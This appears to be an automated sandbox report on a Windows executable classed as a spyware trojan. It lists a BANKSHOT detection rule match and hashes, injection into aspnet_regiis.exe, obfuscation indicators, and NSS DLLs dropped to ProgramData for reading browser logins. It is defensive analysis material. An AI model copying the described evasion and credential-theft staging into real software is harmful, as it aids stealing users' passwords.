Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe

Static PE information: Section: JO_E58 ZLIB complexity 1.0003312317251463

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/26@1/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_6CAC7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6CAC7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_02A114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A11807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: aspnet_regiis.exe, 00000003.00000003.1834985106.0000000002E23000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DCD000.00000004.00000020.00020000.00000000.sdmp, JJKFBA.3.dr, CBKJEG.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uianimation.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A18950

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name: JO_E58
Source: file.exe	Static PE information: section name:
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C342CD push esp; ret	0_2_00C34316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C340DE pushfd ; ret	0_2_00C340E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C31EAB push esp; iretd	0_2_00C31EFF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5DA421 push ecx; ret	0_2_6D5DA434
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2F142 push ecx; ret	3_2_02A2F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1DDB5 push ecx; ret	3_2_02A1DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A22D3B push esi; ret	3_2_02A22D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9B536 push ecx; ret	3_2_6CA9B549

Source: file.exe

Static PE information: section name: JO_E58 entropy: 7.9994803282182785

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Roaming\msvcp110.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
